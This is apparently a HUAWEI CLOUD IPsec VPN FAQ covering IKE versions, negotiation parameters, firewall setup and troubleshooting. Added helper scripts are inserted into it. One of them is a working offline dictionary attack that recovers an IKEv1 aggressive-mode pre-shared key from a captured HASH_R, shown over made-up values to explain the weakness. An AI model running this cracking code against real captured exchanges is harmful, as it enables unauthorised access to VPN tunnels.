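To make the aggressive-mode point concrete, the following Python script is an added example, not part of the original FAQ. It reproduces the responder hash of PSK-authenticated IKEv1 aggressive mode from RFC 2409, section 5.4 (SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), with prf = HMAC-SHA1 here) over constructed field values, then recovers the PSK from a wordlist in the same way tools such as ike-scan's psk-crack do against a captured exchange. Every value in EXCHANGE and WORDLIST is made up for the demonstration; nothing here is HUAWEI CLOUD code or data.

```python
"""Why IKEv1 aggressive mode with a pre-shared key is weak: the responder's
HASH_R travels unencrypted in message 2, and every other input to it is
also visible to the initiator, so the PSK can be guessed offline.

Formulas (RFC 2409, section 5.4, pre-shared key authentication):
  SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
  HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
prf is HMAC with the negotiated hash algorithm (SHA-1 in this example).
All field values below are constructed for the demonstration."""
import hashlib
import hmac

PRF_HASH = hashlib.sha1  # hash algorithm negotiated in the SA payload


def prf(key, data):
    return hmac.new(key, data, PRF_HASH).digest()


def hash_r(psk, f):
    """Responder authentication hash for PSK-authenticated aggressive mode."""
    skeyid = prf(psk, f["ni"] + f["nr"])
    return prf(skeyid, f["gxr"] + f["gxi"] + f["cky_r"] + f["cky_i"]
               + f["sai_b"] + f["idir_b"])


# Constructed aggressive-mode exchange. In a real capture these values come
# from message 1 (initiator: SA, KE, Ni, IDii) and message 2 (responder:
# SA, KE, Nr, IDir, HASH_R), all of which are sent in the clear.
EXCHANGE = {
    "cky_i": bytes.fromhex("0102030405060708"),   # initiator cookie
    "cky_r": bytes.fromhex("a1a2a3a4a5a6a7a8"),   # responder cookie
    "ni": bytes(range(16)),                        # initiator nonce
    "nr": bytes(range(16, 32)),                    # responder nonce
    "gxi": bytes([0x11]) * 128,                    # initiator DH public value (1024-bit, constructed)
    "gxr": bytes([0x22]) * 128,                    # responder DH public value (constructed)
    "sai_b": bytes.fromhex("00000001000000010000002801010001"),  # SA payload body, constructed
    # IDir body: ID type IPV4_ADDR (1), protocol 0, port 0, address 203.0.113.7
    "idir_b": bytes([1, 0, 0, 0]) + bytes([203, 0, 113, 7]),
}
REAL_PSK = b"Summer2021!"  # the secret the responder actually holds (constructed)
EXCHANGE["hash_r"] = hash_r(REAL_PSK, EXCHANGE)  # what message 2 reveals


def crack_psk(captured, candidates):
    """Offline dictionary attack: recompute HASH_R for each candidate PSK
    and compare it with the value observed in the clear."""
    for cand in candidates:
        if hmac.compare_digest(hash_r(cand, captured), captured["hash_r"]):
            return cand
    return None


WORDLIST = [b"password", b"huawei123", b"Summer2021!", b"c0rrect-h0rse"]  # constructed

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(EXCHANGE, WORDLIST))
```

The attack works because message 2 of aggressive mode carries HASH_R, Nr, IDir and the responder's DH public value unencrypted, and the initiator already knows the remaining inputs. In main mode the same hash is sent in message 6, encrypted under keys derived from SKEYID, so it cannot be tested without the PSK; IKEv2 likewise encrypts its AUTH payload. This is why Table 6-1 in 6.2 defaults to IKEv2 and why a PSK must be long and random rather than a dictionary word.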

Differences Between IKEv1 and IKEv2

● Negotiation process

– IKEv1 SA negotiation consists of two phases. IKEv1 is complex and consumes more bandwidth. IKEv1 phase 1 negotiation establishes the IKE SA and supports main mode and aggressive mode. Main mode uses six ISAKMP messages to establish the IKE SA, whereas aggressive mode uses only three, so aggressive mode sets up the IKE SA faster. However, aggressive mode does not provide identity protection, because key exchange and identity authentication are performed at the same time. IKEv1 phase 2 negotiation sets up the IPsec SA for data transmission and uses quick mode (three ISAKMP messages).

– Compared with IKEv1, IKEv2 simplifies SA negotiation. IKEv2 uses two exchanges (four messages in total) to create an IKE SA and a pair of IPsec SAs. To create additional pairs of IPsec SAs, only one more exchange (CREATE_CHILD_SA) is needed per pair.

NOTE

IKEv1 negotiation requires nine (6+3) messages in main mode and six (3+3) messages in aggressive mode. IKEv2 negotiation requires only four (2+2) messages.

● Authentication methods

– Only IKEv1 (with an encryption card) supports digital envelope authentication (HSS-DE).

– IKEv2 supports EAP authentication. IKEv2 can use an AAA server to remotely authenticate mobile and PC users and assign private IP addresses to these users. IKEv1 does not provide this function and must use L2TP to assign private IP addresses.

– Only IKEv2 negotiates a separate integrity algorithm for the IKE SA.

● DPD timeout

– Only IKEv1 supports the retry-interval parameter. If a device sends a DPD packet but receives no reply within the specified retry interval, the device records a DPD failure event. When the number of failure events reaches five, both the IKE SA and the IPsec SA are deleted. IKE SA negotiation is started again when the device has IPsec traffic to handle.

– In IKEv2 mode, the retransmission interval increases from 1, 2, 4, 8, 16, and 32 to 64 seconds. If no reply is received after eight consecutive transmissions, the peer is considered dead, and the IKE SA and IPsec SA are deleted.

● IKE SA timeout and IPsec SA timeout

In IKEv2, the IKE SA soft lifetime is 9/10 of the IKE SA hard lifetime plus or minus a random value, which reduces the likelihood that both endpoints initiate renegotiation at the same time. Therefore, the soft lifetime does not need to be set manually in IKEv2.

Advantages of IKEv2 Over IKEv1

● Simplified SA negotiation, improving negotiation efficiency.

● Closed many cryptographic loopholes, improving security.

● Support for Extensible Authentication Protocol (EAP) authentication, improving authentication flexibility and scalability. EAP is an authentication framework that supports multiple authentication methods; its biggest advantage is scalability, because new authentication methods can be added without changing the existing authentication system. EAP authentication is widely used in dial-up access networks.

● IKEv2 uses an encrypted payload based on the design of ESP. The IKEv2 encrypted payload combines encryption and integrity protection in a way that allows authenticated encryption algorithms to be used. AES-GCM provides confidentiality, integrity, and authentication in one primitive.

5.20 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?

1. Log in to the management console.

2. In the upper right corner of the management console, choose Service Tickets > Create Service Ticket.

Figure 5-1 Create Service Ticket

3. Search for VPN and select Virtual Private Network (VPN).

Figure 5-2 Selecting Virtual Private Network (VPN)

4. Select the service ticket type.

Figure 5-3 Selecting the service ticket type

NOTE

When you submit a service ticket, select a ticket type to facilitate problem handling.

Figure 5-4 Ticket category and classification basis

5.21 Are a Username and Password Required for Creating an IPsec VPN Connection?

No. HUAWEI CLOUD IPsec VPN uses a pre-shared key (PSK) for authentication. The same key is configured on the VPN gateway on the cloud and on the on-premises gateway, and a tunnel is established after VPN negotiation completes. Therefore, usernames and passwords are not required.

Generally, SSL, PPTP, and L2TP VPNs use usernames and passwords for authentication.

NOTE

IPsec XAUTH is an extension of IPsec VPN that prompts users to enter their usernames and passwords during VPN negotiation. HUAWEI CLOUD VPN does not support IPsec XAUTH.

5.22 Which VPN Resources Can Be Monitored?

VPN Gateway

Bandwidth information that can be monitored includes inbound traffic, inbound bandwidth, outbound traffic, outbound bandwidth, and outbound bandwidth usage.

To view VPN gateway metrics, locate the target VPN gateway and click View Metric in the Operation column.

VPN Connection

The VPN connection status can be monitored.

Value 1 indicates that the connection is normal.

Value 0 indicates that the connection is not connected.

To view the VPN connection status, locate the target VPN connection and click View Metric in the Operation column.

5.23 Will I Be Notified If a VPN Connection Is Interrupted?

The VPN connection status can be monitored. After a VPN connection is created, the VPN service reports the connection status to Cloud Eye but does not automatically send alarm notifications to you. To receive notifications, create alarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPN connection and choose Operation > View Metric to view the VPN connection status.

Figure 5-5 View Metric

6 VPN Negotiation and Interconnection

6.1 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?

HUAWEI CLOUD VPN supports the standard IPsec protocol. Devices in your data center can connect to HUAWEI CLOUD if the following requirements are met:

● The devices support IPsec VPN.

● Your data center has a fixed public IP address, or an IP address obtained by NAT mapping of a fixed public IP address.

The devices are mostly routers and firewalls. For details about the interconnection configuration, see the Administrator Guide.

NOTE

● Common home broadband routers, personal mobile terminals, and VPN services (such as L2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.

● Devices that can interconnect with the HUAWEI CLOUD VPN service are usually from the following:

– Vendors such as Huawei (routers and firewalls), H3C (routers and firewalls), Cisco (routers and firewalls), Ruijie (routers and firewalls), ZTE, Sangfor, Fortinet, 360, Topsec, Hillstone, NetentSec, NSFOCUS, DELL, ZyXEL, and Juniper

– Cloud service providers such as Alibaba Cloud, Tencent Cloud, and Amazon Web Services

– Software vendors such as Openswan, strongSwan, and GreenBow

● IPsec is a standard IETF protocol. Devices that support IPsec can interconnect with HUAWEI CLOUD. Most enterprise-level routers and firewalls support IPsec.

● However, some devices support IPsec VPN only after you purchase the required software licenses. Ask the data center administrator to confirm the device model and licensing with the vendor.

6.2 What Are VPN Negotiation Parameters? What Are Their Default Values?

Table 6-1 VPN negotiation parameters

Policy | Parameter                 | Value
-------+---------------------------+-------------------------------------------------------------
IKE    | Authentication Algorithm  | SHA2-256 (default), SHA1, MD5, SHA2-384, and SHA2-512
IKE    | Encryption Algorithm      | AES-128 (default), AES-192, AES-256, and 3DES
IKE    | DH Algorithm              | Group 14 (default), Group 1, Group 2, Group 5, Group 15, Group 16, Group 19, Group 20, and Group 21
       |                           | NOTE: In some regions, only Group 14, Group 2, and Group 5 are available.
IKE    | Version                   | v2 (default) and v1
IKE    | Lifecycle (s)             | 86400 (default); unit: second; value range: 60 to 604800
IKE    | Negotiation Mode          | Main (default) and Aggressive; this parameter is mandatory when Version is set to v1
IPsec  | Authentication Algorithm  | SHA2-256 (default), SHA1, MD5, SHA2-384, and SHA2-512
IPsec  | Encryption Algorithm      | AES-128 (default), AES-192, AES-256, and 3DES
IPsec  | PFS                       | DH group 14 (default), DH group 1, DH group 2, DH group 5, DH group 15, DH group 16, DH group 19, DH group 20, DH group 21, or Disable
       |                           | NOTE: In some regions, only DH group 14, DH group 2, and DH group 5 are available.
IPsec  | Transfer Protocol         | ESP (default), AH, and AH-ESP
IPsec  | Packet Encapsulation Mode | TUNNEL
IPsec  | Lifecycle (s)             | 3600 (default); unit: second; value range: 480 to 604800

NOTE

● Perfect Forward Secrecy (PFS) is a security feature. IKE negotiation has two phases, phase one and phase two. The key of phase two (IPsec SA) is derived from the key generated in phase one. Once the key in phase one is disclosed, the security of the IPsec VPN may be adversely affected. To improve key security, IKE provides the PFS function. After PFS is turned on, an additional DH exchange is performed during IPsec SA negotiation, and a new IPsec SA key is generated, improving IPsec SA security.

● To ensure security, PFS is enabled on HUAWEI CLOUD by default. Ensure that PFS is also enabled on the gateway in your on-premises data center. Otherwise, the negotiation will fail.

● To enable PFS, ensure that the configurations on both ends of a VPN are the same.

● The traffic-based lifetime of an IPsec SA on the HUAWEI CLOUD VPN defaults to 1,843,200 KB and cannot be changed. This lifetime does not affect the establishment of an IPsec SA.
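The symmetry requirement in the note above, worked through as an added example (not Huawei code): a Python checker that compares a constructed on-premises proposal against the Table 6-1 defaults and lists every reason the negotiation would fail. The on-premises values, the field names, and the weak-group warning taken from 6.16 are assumptions of this example.

```python
"""Compare an on-premises IKE/IPsec proposal with the HUAWEI CLOUD defaults
from Table 6-1 and list every reason negotiation would fail.
Added example, not Huawei code; the on-premises values are constructed."""

# Allowed values transcribed from Table 6-1. None for "mode" means "not set",
# which is acceptable unless IKE version v1 is used.
IKE_ALLOWED = {
    "auth": {"SHA2-256", "SHA1", "MD5", "SHA2-384", "SHA2-512"},
    "enc": {"AES-128", "AES-192", "AES-256", "3DES"},
    "dh": {1, 2, 5, 14, 15, 16, 19, 20, 21},
    "version": {"v1", "v2"},
    "mode": {"Main", "Aggressive", None},
}
IPSEC_ALLOWED = {
    "auth": IKE_ALLOWED["auth"],
    "enc": IKE_ALLOWED["enc"],
    "pfs": {1, 2, 5, 14, 15, 16, 19, 20, 21, "Disable"},
    "proto": {"ESP", "AH", "AH-ESP"},
}
LIFETIME_RANGE = {"IKE": (60, 604800), "IPsec": (480, 604800)}

# Cloud-side defaults from Table 6-1 (IKEv2, so no negotiation mode).
CLOUD_IKE = {"auth": "SHA2-256", "enc": "AES-128", "dh": 14,
             "version": "v2", "lifetime": 86400}
CLOUD_IPSEC = {"auth": "SHA2-256", "enc": "AES-128", "pfs": 14,
               "proto": "ESP", "lifetime": 3600}

# The table notes that some regions offer only these DH groups.
RESTRICTED_REGION_DH = {2, 5, 14}
# 6.16 lists these groups as having security risks.
WEAK_DH = {1, 2, 5}


def check_policy(kind, cloud, onprem, restricted_region=False):
    """Return the problems found for one policy ("IKE" or "IPsec").
    An empty list means the two ends can negotiate that phase."""
    allowed = IKE_ALLOWED if kind == "IKE" else IPSEC_ALLOWED
    problems = []
    # 1. Every on-premises value must be one the cloud supports at all.
    for key, values in allowed.items():
        if onprem.get(key) not in values:
            problems.append(f"{kind} {key}={onprem.get(key)!r} is not supported on the cloud")
    # 2. The lifetime must lie inside the table's value range.
    lo, hi = LIFETIME_RANGE[kind]
    if not lo <= onprem["lifetime"] <= hi:
        problems.append(f"{kind} lifetime {onprem['lifetime']} s is outside {lo}-{hi}")
    # 3. Both ends must be configured identically (6.4: symmetry of the
    #    tunnel; 7.2: SA lifecycles at both ends must be consistent).
    for key, value in cloud.items():
        if value != onprem.get(key):
            problems.append(f"{kind} {key} mismatch: cloud={value!r} on-prem={onprem.get(key)!r}")
    # 4. Negotiation Mode is mandatory when IKE version v1 is used.
    if kind == "IKE" and onprem.get("version") == "v1" and onprem.get("mode") is None:
        problems.append("IKE version v1 requires Negotiation Mode (Main or Aggressive)")
    # 5. PFS is on by default on the cloud; disabling it on-prem fails negotiation.
    if kind == "IPsec" and onprem.get("pfs") == "Disable" and cloud["pfs"] != "Disable":
        problems.append("IPsec PFS is disabled on-prem but enabled on the cloud")
    # 6. Regional availability (table notes) and weak-group advice (6.16).
    group = onprem.get("dh" if kind == "IKE" else "pfs")
    if isinstance(group, int):
        if restricted_region and group not in RESTRICTED_REGION_DH:
            problems.append(f"{kind} DH group {group} is not available in this region")
        if group in WEAK_DH:
            problems.append(f"warning: {kind} DH group {group} is not recommended (security risk)")
    return problems


if __name__ == "__main__":
    # Constructed on-premises proposal modelled on the USG6600 example in 6.4:
    # DH group 5, SHA1, IKEv1 with no negotiation mode, 3600 s IKE lifetime.
    onprem_ike = {"auth": "SHA1", "enc": "AES-128", "dh": 5,
                  "version": "v1", "lifetime": 3600}
    onprem_ipsec = {"auth": "SHA1", "enc": "AES-128", "pfs": 5,
                    "proto": "ESP", "lifetime": 3600}
    for problem in (check_policy("IKE", CLOUD_IKE, onprem_ike)
                    + check_policy("IPsec", CLOUD_IPSEC, onprem_ipsec)):
        print(problem)
```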

6.3 Will an IPsec VPN Connection Be Established Automatically?

After you complete the configurations on both ends of an IPsec VPN connection, the VPN connection is not established automatically. It is established only after data flows between the two ends of the connection. If no data flows between the cloud and the on-premises data center, the VPN connection will always be in the down state. Any data generated by accessing or pinging between servers can trigger the establishment of a VPN connection.

The establishment of a VPN connection can be triggered either through the gateways of the VPN connection or by the traffic between servers on the cloud and in an on-premises data center.

However, automatic establishment of a VPN connection cannot be triggered by a VPN gateway on HUAWEI CLOUD. Verify that the establishment of your VPN connection can be triggered by the data flows between the two ends of the VPN connection. That is, check whether a VPN connection can be established after you ping a server on the cloud from a server in the on-premises data center, and whether a VPN connection can be established after you disconnect the connection and ping a server in the on-premises data center from a server on the cloud.

NOTE

The source and destination addresses of the ping packets must be protected by the VPN. Before a VPN connection is established, the gateway IP addresses of both ends can be pinged. However, pinging the gateway IP addresses does not trigger the establishment of the VPN connection.


6.4 How Do I Configure a VPN for a Device in a Data Center? (Configuring the VPN on a Huawei USG6600 Series Firewall)

Due to the symmetry of the tunnel, the VPN parameters configured on the cloud must be the same as those configured in your own data center. If they are different, a VPN cannot be established.

To set up a VPN, you also need to configure the IPsec VPN on the router or firewall in your own data center. The configuration method may vary depending on the network device in use. For details, see the configuration guide of your network device.

This section describes how to configure the IPsec VPN on a Huawei USG6600 series V100R001C30SPC300 firewall for your reference.

For example, the subnets of the data center are 192.168.3.0/24 and 192.168.4.0/24, the subnets of the VPC are 192.168.1.0/24 and 192.168.2.0/24, and the public IP address of the IPsec tunnel egress in the VPC is XXX.XXX.XX.XX, which can be obtained from the local gateway parameters of the IPsec VPN in the VPC.

Procedure

1. Log in to the CLI of the firewall.

2. Check the firewall version information.

   display version
   17:20:50 2017/03/09
   Huawei Versatile Security Platform Software
   Software Version: USG6600 V100R001C30SPC300 (VRP (R) Software, Version 5.30)

3. Create an access control list (ACL) and bind it to the target VPN instance.

   acl number 3065 vpn-instance vpn64
   rule 1 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
   rule 2 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
   rule 3 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
   rule 4 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
   q

4. Create an IKE proposal.

   ike proposal 64
   dh group5
   authentication-algorithm sha1
   integrity-algorithm hmac-sha2-256
   sa duration 3600
   q

5. Create an IKE peer and reference the created IKE proposal. The peer IP address is 93.188.242.110.

   ike peer vpnikepeer_64
   pre-shared-key ******** (******** specifies the pre-shared key.)
   ike-proposal 64
   undo version 2
   remote-address vpn-instance vpn64 93.188.242.110
   sa binding vpn-instance vpn64
   q

6. Create an IPsec proposal.

   ipsec proposal ipsecpro64
   encapsulation-mode tunnel
   esp authentication-algorithm sha1
   q

7. Create an IPsec policy and reference the IKE peer and IPsec proposal.

   ipsec policy vpnipsec64 1 isakmp
   security acl 3065
   pfs dh-group5
   ike-peer vpnikepeer_64
   proposal ipsecpro64
   local-address xx.xx.xx.xx
   q

8. Apply the IPsec policy to the subinterface.

   interface GigabitEthernet0/0/2.64
   ipsec policy vpnipsec64
   q

9. Test the connectivity. After you perform the preceding operations, you can test the connectivity between your ECSs on the cloud and the servers in your data center. For details, see the following figure.

Figure 6-1 Connectivity test

6.5 How Should I Configure the Gateway Device of the Customer Data Center When I Use a VPN to Connect to the Cloud?

Determine the subnet of the customer data center, the subnet on the cloud, and the gateway IP addresses at both ends.

Then, configure IPsec on the gateway of the customer data center according to the VPN negotiation policies on the cloud, and add rules to the security group associated with the VPC to allow ICMP packets in both the inbound and outbound directions.

● Route setting: Add routes from the customer gateway to the VPN gateway egress. The next hop of the route on the VPN gateway is the public gateway IP address in the outbound direction.

● NAT setting: On the VPN gateway device, disable NAT for traffic from the local subnet to the VPC subnet. Add security group rules to allow mutual access between the local subnet and the VPC subnet, and allow UDP 500, UDP 4500, ESP (IP protocol 50), and AH (IP protocol 51) packets both from and to the IP addresses of the VPN gateway on the cloud and the gateway of the customer data center.

6.6 Can HUAWEI CLOUD VPN Connect to a Remote Gateway Through a Domain Name?

No. A VPN connection can only connect to a remote gateway through the gateway's public IP address.

6.7 How Many Tunnels Does My VPN Connection Have?

The number of tunnels in a VPN connection is related to the number of local subnets and remote subnets. The total number of tunnels equals the number of local subnets multiplied by the number of remote subnets of a VPN. The status of a VPN connection is normal as long as at least one of its tunnels is in the active state. If you need every tunnel to be in the active state, data flows need to be triggered between every pair of subnets.
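The ACL rules in 6.4 step 3, the tunnel arithmetic in 6.7, and the mirrored interesting-traffic check in 6.15, derived in code as an added example (not Huawei code): given the local and remote subnet lists, this Python script emits one USG-style permit rule per subnet pair, computes the tunnel count, and reports any pair that is protected on one end but not mirrored on the other. The rule syntax, ACL number and VPN instance name are the page's own sample values from step 3.

```python
"""Derive the per-subnet-pair ACL rules from 6.4 step 3, the tunnel count
from 6.7, and the mirrored-interesting-traffic check from 6.15 for a set of
local and remote subnets. Added example, not Huawei code; the USG-style rule
text is modelled on the page's step 3 and the subnets are the page's."""
import ipaddress


def acl_rules(local_subnets, remote_subnets, acl_number=3065, vpn_instance="vpn64"):
    """Emit one permit rule per (local, remote) pair in USG ACL syntax, which
    takes a wildcard mask (the inverted netmask) rather than a prefix length."""
    lines = [f"acl number {acl_number} vpn-instance {vpn_instance}"]
    rule = 1
    for local in local_subnets:
        src = ipaddress.ip_network(local, strict=True)
        for remote in remote_subnets:
            dst = ipaddress.ip_network(remote, strict=True)
            lines.append(
                f"rule {rule} permit ip source {src.network_address} {src.hostmask} "
                f"destination {dst.network_address} {dst.hostmask}")
            rule += 1
    lines.append("q")
    return lines


def tunnel_count(local_subnets, remote_subnets):
    """6.7: one tunnel per local/remote subnet pair."""
    return len(local_subnets) * len(remote_subnets)


def protected_pairs(local_subnets, remote_subnets):
    """The (source, destination) pairs one end's interesting traffic covers,
    normalised to canonical CIDR text so that 192.168.3.0/24 and
    192.168.3.0/255.255.255.0 compare equal."""
    return {(str(ipaddress.ip_network(l)), str(ipaddress.ip_network(r)))
            for l in local_subnets for r in remote_subnets}


def mirror_mismatches(dc_local, dc_remote, cloud_local, cloud_remote):
    """6.15: the data center's (local, remote) pairs must equal the cloud's
    (remote, local) pairs. Returns the pairs present on only one end, seen
    from the data center; an empty list means the traffic is mirrored."""
    dc = protected_pairs(dc_local, dc_remote)
    cloud_mirrored = {(r, l) for (l, r) in protected_pairs(cloud_local, cloud_remote)}
    return sorted(dc ^ cloud_mirrored)


if __name__ == "__main__":
    # Subnets from 6.4: data center 192.168.3.0/24 and 192.168.4.0/24,
    # VPC 192.168.1.0/24 and 192.168.2.0/24.
    dc = ["192.168.3.0/24", "192.168.4.0/24"]
    vpc = ["192.168.1.0/24", "192.168.2.0/24"]
    print("\n".join(acl_rules(dc, vpc)))
    print("tunnels:", tunnel_count(dc, vpc))
    # A cloud-side connection that omitted 192.168.4.0/24 as a remote subnet:
    print("unmirrored pairs:", mirror_mismatches(dc, vpc, vpc, ["192.168.3.0/24"]))
```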

6.8 How Do I Allow Specific Servers to Access a Subnet on the Cloud Through a Created VPN Connection?

Configurations off the cloud

● Configure deny rules on VPN devices.

● Configure ACLs on routers or switches.

Configurations on the cloud

● Configure security group rules to deny access from specific IP addresses.

● Configure network ACL rules.

NOTE

All rules must be added to the device before the VPN tunnel is established. Do not change the local subnet and the remote subnet to restrict the access.

6.9 Do HUAWEI CLOUD VPNs Have the DPD Mechanism Enabled?

Yes.

HUAWEI CLOUD VPNs have the DPD mechanism enabled by default to detect the status of the IKE process in the customer data center.

After three consecutive detection failures, HUAWEI CLOUD considers that the IKE process of the customer data center is abnormal. In this case, HUAWEI CLOUD deletes the local tunnel to ensure tunnel synchronization between the two ends.

The DPD protocol does not require that the peer end be configured synchronously, but requires that the peer end can respond to DPD detections. To ensure that the tunnel status of the two ends is consistent and to avoid one end having a tunnel and the other not, it is recommended that you enable the DPD mechanism of the gateway on your side to detect the IKE process status of the VPN service on the HUAWEI CLOUD side.

NOTE

After DPD fails, the tunnel will be deleted without affecting service stability. DPD can detect exceptions of the IKE process on the peer end in time and reset the tunnel to ensure tunnel synchronization between the two ends. After a tunnel is deleted, if there is user traffic to be transmitted over the tunnel, the tunnel can be re-established through negotiation.

6.10 How Can I Use Security Groups to Prevent ECSs in a VPC From Being Accessed Through a VPN to Implement Security Isolation?

You can configure security groups to allow access only to specific CIDR blocks or ECSs in a VPC through a VPN.

Configuration example: Prevent ECSs in the subnet 10.1.0.0/24 in a VPC from accessing the customer subnet 192.168.1.0/24.

Configuration method:

1. Create security groups 1 and 2.

2. Security group 1 denies access from the subnet 192.168.1.0/24.

3. Security group 2 allows access from the subnet 192.168.1.0/24.

4. Add ECSs in the subnet 10.1.0.0/24 to security group 1 and other ECSs to security group 2.

6.11 Will a VPN Connection Be Reestablished After Its Configuration Is Modified?

A VPN connection consists of the local subnet, remote subnet, remote gateway, pre-shared key, IKE negotiation policy, and IPsec negotiation policy. A VPN connection is modified if any of the following happens:

● If the local and remote subnets are modified, the connection ID remains unchanged, but the subnet information at both ends of the connection is updated. If not all subnets are updated, the established tunnels between subnets will not be re-established.

● If the IP address of the remote gateway is changed, the connection ID will not be changed, but the peer end has changed. The connection needs to be re-established.

● If only the pre-shared keys of the connection are changed, the connection ID and status will not be changed. The keys will be checked again during renegotiation. If the keys do not match, the renegotiation fails.

● If the negotiation policy is modified (pre-shared key authentication is required), the connection ID will be changed and the connection needs to be re-established.

6.12 Why Can't I Initiate Negotiation from Amazon Web Services to HUAWEI CLOUD After They Are Interconnected?

After the VPN connection is established, Amazon Web Services (AWS) works in Response mode and does not initiate negotiation. When data flows are sent from the AWS EC2 to the HUAWEI CLOUD ECS, the VPN connection will not be triggered to establish an SA.

According to the AWS documentation, negotiation can be initiated only from HUAWEI CLOUD.

6.13 How Do I Configure DPD for Interconnecting with HUAWEI CLOUD?

By default, Dead Peer Detection (DPD) is enabled on HUAWEI CLOUD and cannot be disabled.

Configure DPD as follows:

● DPD-type: on-demand

● DPD idle-time: 30s

● DPD retransmit-interval: 15s

● DPD retry-limit: 3

● DPD msg: seq-hash-notify

The DPD msg format on the two ends of the connection must be the same, but the DPD type, idle time, retransmission interval, and retry limit can be different.

6.14 What Should I Do If My Firewall Cannot Receive Response Packets of IKE Phase 1 from the HUAWEI CLOUD VPN Gateway?

1. Check whether the public IP addresses of the two ends can communicate with each other. You can run the ping command. By default, the gateway IP address on HUAWEI CLOUD can be pinged.

2. Ensure that the on-premises gateway and the HUAWEI CLOUD VPN gateway can exchange packets on UDP ports 500 and 4500.

3. Ensure that the source port number is not translated when the on-premises public IP address accesses the gateway IP address on HUAWEI CLOUD. If NAT traversal exists, ensure that the port number will not be changed after NAT traversal.

4. The IKE negotiation parameter settings at both ends must be the same. In the NAT traversal scenario, set the ID type off the cloud to IP and the local ID on the cloud to the public IP address after NAT.

6.15 What Should I Do If My Firewall Cannot Receive Response Packets from the HUAWEI CLOUD VPN Subnet?

1. Check the on-premises routes, security policies, NAT configuration, interesting traffic, and negotiation policies for the Phase 2 negotiation.

– Route configurations: Send the data for accessing the cloud subnet to the tunnel.

– Security policies: Allow traffic from on-premises subnets to cloud subnets.

– NAT policies: Do not perform NAT when an on-premises subnet accesses a cloud subnet.

– Interesting traffic: The interesting traffic at both ends must be configured as mirror images of each other. An address object name cannot be used for interesting traffic configured using IKEv2.

– Negotiation policies: Ensure that the negotiation policies, especially PFS, at both ends are the same.

2. After confirming that both Phase 1 and Phase 2 negotiations are normal, check that the security group rules on the cloud allow the on-premises subnet to access the cloud subnet using the ICMP protocol.

6.16 What Are the Bits of the DH Groups Used by HUAWEI CLOUD VPN?

The Diffie-Hellman (DH) groups determine the strength of the key used in the key exchange process. Higher DH group numbers are usually more secure, but extra time is required to calculate the key.

Table 6-2 lists the bits corresponding to the DH groups used by VPN.

Table 6-2 Bits corresponding to each DH group

DH Group | Modulus
1        | 768 bits
2        | 1024 bits
5        | 1536 bits
14       | 2048 bits
15       | 3072 bits
16       | 4096 bits
19       | ecp256 bits
20       | ecp384 bits
21       | ecp521 bits

NOTE

The following DH algorithms have security risks and are not recommended: DH group 1, DH group 2, and DH group 5.


7 Connection or Ping Failure

7.1 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration Is Complete?

Ensure that the pre-shared keys and negotiation information at both ends are consistent. The local subnet and VPN gateway on the cloud are the remote subnet and remote gateway in the on-premises data center. The remote gateway and remote subnet on the cloud are the local gateway and local subnet in the on-premises data center.

Ensure that the routing, NAT, and security rules are correctly configured on the gateway device of your on-premises data center. Then, ping the servers in the subnets at both ends.

NOTE

VPN is triggered based on data flows. After you configure the VPN, ping the servers in the peer subnet. Before running the ping command, disable the server firewall and allow inbound ICMP requests in the security group on the cloud. Pinging the gateway IP address cannot trigger VPN negotiation. Ping the server in the subnet protected by the gateway.

7.2 How Can I Prevent VPN Connection Interruption?

VPN connections may be renegotiated when the IPsec SA lifecycle is about to expire or the data transferred through the VPN connection exceeds 20 GB. Usually, renegotiation does not interrupt VPN connections.

Most disconnections are caused by incorrect configurations on both ends of the VPN connection or by renegotiation failures due to Internet exceptions.

The common causes of connection interruptions are as follows:

● ACLs of the devices at the two ends of the VPN connection do not match.

● SA lifecycles at the two ends of the VPN connection do not match.


● DPD is not configured in the data center.

● Configuration is modified when the VPN is used.

● Packets are fragmented because the data size exceeds the MTU.

● Jitter occurs on the carrier's network.

Therefore, ensure the following configurations to keep the VPN connection alive:

● Local and remote subnets are matched pairs.

● SA lifecycles at the two ends of the VPN connection are consistent.

● DPD is enabled on the gateway device of the data center, and the number ofdetection times is greater than or equal to 5.

● Parameters are modified at both ends of the VPN connection during the useof the VPN connection.

● Set TCP MAX-MSS to 1300 for the gateway device in the data center.

● The bandwidth of the gateway in the data center is large enough to be usedby VPN.

● VPN connection negotiation can be triggered by the two ends and the activenegotiation configuration of the gateway in the data center has beenenabled.

● Run a long ping on the subnets at both ends. The script content is as follows:

   #!/bin/sh
   # Usage: ./ping.sh HOST
   # Probes HOST once every 5 seconds and appends the result to HOST.log.
   host=$1
   if [ -z "$host" ]; then
       echo "Usage: `basename $0` [HOST]"
       exit 1
   fi
   log_name=$host".log"

   while :; do
       # One probe with a 1 s timeout; grep succeeds only when a reply line is present.
       result=`ping -W 1 -c 1 "$host" | grep 'bytes from '`
       if [ $? -gt 0 ]; then
           echo "`date +'%Y/%m/%d %H:%M:%S'` - host $host is down" | tee -a "$log_name"
       else
           echo "`date +'%Y/%m/%d %H:%M:%S'` - host $host is ok - `echo $result | cut -d ':' -f 2`" | tee -a "$log_name"
       fi
       sleep 5 # avoid ping rain
   done
   #./ping.sh x.x.x.x >>/dev/null &

NO TE

1. Use the vi editor to copy the preceding script to the ping.sh file.

2. Run the chmod 777 ping.sh command to grant permissions to the file.

3. Run the ping command:

./ping.sh x.x.x.x >>/dev/null &

x.x.x.x indicates the IP address to be pinged.

4. After the ping command is executed, the x.x.x.x.log file is generated. Run the following command:

tail -f x.x.x.x.log

You can view the long ping result in real time.
